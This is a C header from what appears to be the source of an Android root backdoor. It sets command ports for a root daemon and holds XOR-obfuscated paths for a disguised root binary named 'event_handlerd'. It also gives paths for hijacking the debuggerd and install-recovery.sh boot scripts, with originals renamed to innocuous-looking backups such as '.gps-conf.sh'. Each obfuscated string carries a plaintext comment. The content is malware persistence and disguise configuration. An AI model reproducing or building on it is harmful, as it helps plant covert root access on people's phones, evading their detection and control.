shared/headers/shell_params.h
// Socket used by root daemon to accept commands
#define OLD_SHELL_PORT 60342
#define SHELL_PORT 60343
// File used as client by the backdoor to execute commands
#define ROOT_BIN "\x5b\x10\x44\x94\x28\x22\x28\x2f\x5e\x56\x94\x59\x52\x55\x94\x5f\x5f\x5d" // "/system/bin/ddf"
#define ROOT_BIN_ARG0 "\x4b\xbf\xfa\x52\x43\x52\x5b\x41\x6c\x5d\x56\x5b\x51\x59\x52\x47\x51" // "event_handlerd" used as argv[0] when executed
// Debuggerd boot script params
#define INSTALL_SCRIPT "\xf2\x01\xe6\xdf\x83\x8d\x83\x86\x99\xa1\xdf\x90\x9d\x9c\xdf\x96\x99\x90\x89\x97\x97\x99\x80\x96" // "/system/bin/debuggerd"
#define INSTALL_SCRIPT_BAK "\x49\x5b\x02\x9a\xce\xd0\xce\xc3\xdc\x24\x9a\xdd\x20\xd9\x9a\xd3\xdd\xd2\xd3" // "/system/bin/dbgd", the original file
#define INSTALL_SCRIPT_BAK_ARG0 "\xc8\x40\x8c\xac\xaa\xaf\xac" // "dbgd"
// Install-recovery boot script params
#define INSTALL_REC_SCRIPT "\xb8\xe9\x4e\x69\x5d\x43\x5d\x5c\x2f\x57\x69\x2f\x5c\x2d\x69\x53\x56\x5d\x5c\x2b\x54\x54\x97\x5a\x2f\x2d\x29\x5e\x2f\x5a\x43\x96\x5d\x50" // "/system/etc/install-recovery.sh"
#define INSTALL_REC_SCRIPT_BAK "\x0f\xfe\xe9\xe0\x84\x8a\x84\x87\x96\x9e\xe0\x96\x87\x94\xe0\xe1\x98\x83\x84\xde\x94\xa0\xa1\x99\xe1\x84\x9b" // "/system/etc/.gps-conf.sh"
#define OPT "\xd2\x64\xbe\x07\x07\x7e\x73\x7f\x47\x45\x44" // "--daemon"